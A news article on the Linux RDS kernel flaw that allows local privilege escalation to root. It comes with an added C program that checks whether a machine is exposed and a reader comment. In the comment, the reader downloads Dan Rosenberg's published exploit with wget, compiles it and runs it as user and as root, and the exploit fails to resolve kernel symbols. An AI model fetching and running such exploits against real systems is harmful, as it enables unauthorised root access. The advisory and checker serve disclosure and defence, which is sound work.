The Linux kernel contains a serious security flaw that a local user can exploit to gain superuser (root) rights on the system.
The vulnerability, in the Linux implementation of the Reliable Datagram Sockets (RDS) protocol, affects unpatched kernels from 2.6.30 onward, the release in which RDS was first included.
According to VSR Security, the research outfit that discovered the hole, Linux installations are only vulnerable if the CONFIG_RDS kernel configuration option is set and if unprivileged users are not prevented from loading protocol family modules, as is the case on most stock distributions: when a program creates a socket of an address family whose protocol is not yet loaded, the kernel loads the matching module automatically, so an ordinary user can bring the RDS code into the kernel simply by asking for an RDS socket.
Because the kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in user space, a local attacker could issue specially crafted socket calls to write arbitrary values into kernel memory. With that write primitive, an unprivileged user can escalate privileges to root.
The company has released a proof-of-concept exploit to demonstrate the severity of the vulnerability. The folks at The H Security tested the exploit on Ubuntu 10.04 (64-bit) and successfully opened a root shell.
A fix for this issue has been committed by Linus Torvalds. VSR Security recommends that users install updates provided by downstream distributions or apply the committed patch and recompile their kernel.
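As an added example that is not code from the article, from VSR Security or from the published exploit, the program below checks the two exposure conditions described above on the machine it runs on: whether CONFIG_RDS is enabled in the running kernel's config, and whether an unprivileged user can actually get the RDS protocol family into the kernel, which is what the exploit needs. It assumes the kernel config is at /boot/config-<release> and that the conventional modprobe rule "install rds /bin/true" is how autoload of the rds module gets denied; both are assumptions, and other ways of restricting module loading are not detected.

```c
/* Added example, not code from the article, VSR Security or the exploit:
 * a local check of the two exposure conditions named above, for use before
 * patching. Assumptions: the kernel config is /boot/config-<release>, and a
 * modprobe "install rds <cmd>" rule (conventionally /bin/true) is what denies
 * autoload of the rds module; other module-loading restrictions are not seen. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/utsname.h>

#ifndef PF_RDS
#define PF_RDS 21 /* AF_RDS in linux/socket.h */
#endif

enum rds_state { RDS_OFF = 0, RDS_MODULE = 'm', RDS_BUILTIN = 'y' };

static const char *next_line(const char *p)
{
    p = strchr(p, '\n');
    return p ? p + 1 : NULL;
}

/* Condition 1: find the CONFIG_RDS line in kernel config text. Matching up to
 * and including '=' keeps CONFIG_RDS_TCP and CONFIG_RDS_RDMA from matching;
 * "# CONFIG_RDS is not set" yields RDS_OFF. */
enum rds_state rds_config_state(const char *text)
{
    for (const char *p = text; p; p = next_line(p)) {
        if (strncmp(p, "CONFIG_RDS=", 11) != 0)
            continue;
        return p[11] == 'y' ? RDS_BUILTIN : p[11] == 'm' ? RDS_MODULE : RDS_OFF;
    }
    return RDS_OFF;
}

/* Condition 2, static view: does modprobe.d text carry "install rds ..."?
 * modprobe then runs that command instead of loading the module, so the
 * kernel's request_module("net-pf-21") from socket() loads nothing. */
int modprobe_denies_rds(const char *text)
{
    for (const char *p = text; p; p = next_line(p)) {
        while (*p == ' ' || *p == '\t') p++;
        if (strncmp(p, "install", 7) != 0 || (p[7] != ' ' && p[7] != '\t'))
            continue;
        for (p += 7; *p == ' ' || *p == '\t'; p++)
            ;
        if (strncmp(p, "rds", 3) == 0 && (p[3] == ' ' || p[3] == '\t'))
            return 1;
    }
    return 0;
}

/* Condition 2, live view: ask the kernel for an RDS socket as the calling
 * user. 1: family reachable (rds loaded, or just autoloaded by this call),
 * 0: the kernel refused the family, -1: some other error. */
int rds_socket_probe(void)
{
    int fd = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if (fd >= 0) {
        close(fd);
        return 1;
    }
    return (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
            errno == EPROTONOSUPPORT || errno == EINVAL) ? 0 : -1;
}

int main(void)
{
    struct utsname u;
    char path[128] = "(unknown)", line[512];
    enum rds_state st = RDS_OFF;
    FILE *f = NULL;

    if (uname(&u) == 0)
        snprintf(path, sizeof path, "/boot/config-%s", u.release);
    if ((f = fopen(path, "r")) != NULL) {
        while (fgets(line, sizeof line, f))
            if (rds_config_state(line) != RDS_OFF)
                st = rds_config_state(line);
        fclose(f);
    }
    printf("[*] CONFIG_RDS in %s: %s\n", path, st == RDS_BUILTIN ? "y (built in)"
           : st == RDS_MODULE ? "m (module)" : "not set, or config unreadable");

    int probe = rds_socket_probe();
    if (probe == 1)
        printf("[!] socket(PF_RDS) succeeded as uid %d: RDS reachable, exposed "
               "unless the kernel carries the fix\n", (int)getuid());
    else if (probe == 0)
        printf("[+] kernel refused PF_RDS (errno %d): this user cannot load rds\n", errno);
    else
        printf("[?] socket(PF_RDS) failed with errno %d: inconclusive\n", errno);
    return probe == 1;
}
```

Build it with gcc and run it as an ordinary user, not as root, since the question is what an unprivileged account can reach. Note that the probe has a side effect: if autoload is permitted, the socket() call itself loads the rds module, so lsmod will show it afterwards even though nothing was loaded before. A kernel that refuses PF_RDS for an ordinary user while rds is not loaded is not reachable by the exploit; a kernel that hands out the socket is exposed unless it already carries the fix.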
Ron on
I installed my kernel back on 01-Oct, so it should be vulnerable, but it's not, even when I modprobed the rds modules and ran the code from root.
$ apt-cache policy linux-image-2.6.32-5-amd64
linux-image-2.6.32-5-amd64:
  Installed: 2.6.32-24
  Candidate: 2.6.32-26
  Version table:
     2.6.32-26 0
        500 http://mirrors.kernel.org/debian/ sid/main amd64 Packages
 *** 2.6.32-24 0
        100 /var/lib/dpkg/status
$ uname -r
2.6.32-5-amd64
$ cat /etc/debian_version
squeeze/sid
$ grep RDS /boot/config-2.6.32-5-amd64
CONFIG_RDS=m
CONFIG_RDS_RDMA=m
CONFIG_RDS_TCP=m
# CONFIG_RDS_DEBUG is not set
# modprobe rds
# modprobe rds_tcp
# modprobe rds_rdma
$ lsmod | grep rds
rds_rdma 56776 0
rdma_cm 20582 1 rds_rdma
ib_core 40967 6 rds_rdma,rdma_cm,ib_cm,iw_cm,ib_sa,ib_mad
rds_tcp 8260 0
rds 70414 2 rds_rdma,rds_tcp
$ ls -o /boot/System.map-$(uname -r)
-rw-r--r-- 1 root 1661060 Sep 30 00:56 /boot/System.map-2.6.32-5-amd64
$ wget http://www.vsecurity.com/download/tools/linux-rds-exploit.c
--2010-10-21 10:18:35-- http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Resolving www.vsecurity.com... 209.67.252.12
Connecting to www.vsecurity.com|209.67.252.12|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6435 (6.3K) [text/x-c]
Saving to: “linux-rds-exploit.c”
100%[=================================================================>] 6,435 33.4K/s in 0.2s
2010-10-21 10:18:36 (33.4 KB/s) - “linux-rds-exploit.c” saved [6435/6435]
$ gcc linux-rds-exploit.c
$
$ ls -o a.out
-rwxr-xr-x 1 me 12900 Oct 21 10:21 a.out
$ ./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.
$ sudo ~me/a.out
[sudo] password for me:
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.
# ~me/a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.